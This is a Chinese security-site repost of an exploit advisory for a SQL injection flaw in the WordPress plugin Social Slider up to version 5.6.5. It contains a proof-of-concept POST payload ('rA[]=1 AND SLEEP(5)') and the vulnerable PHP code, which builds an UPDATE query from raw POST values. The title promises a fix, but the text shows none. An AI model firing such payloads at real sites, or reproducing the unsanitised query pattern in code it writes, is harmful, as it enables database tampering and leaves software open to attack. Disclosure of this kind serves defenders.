Social Slider <= 5.6.5 SQL注射缺陷及修复

Social Slider <= 5.6.5 SQL注射缺陷及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 14:46 作者：阅读:次

[导读] # Exploit Title: Social Slider = 5.6.5 SQL Injection Vulnerability# Date: 2011-08-05# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# Software Link: http://......

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (已测试)

---------------
PoC (POST data)
---------------
http://www.2cto.com /wp-content/plugins/social-slider-2/ajax.php
action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;

$SocialSliderArray = $_POST['rA'];

if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;
        }
    }
?>

ProPlayer plugin <= 4.7.7 SQL注射缺陷及修复 - 网站安

脚本检测用到的一些关键字 - 网站安全 - 自学p

子栏目

Social Slider <= 5.6.5 SQL注射缺陷及修复 - 网站安全

最新评论

添加评论

更多文章推荐

添加评论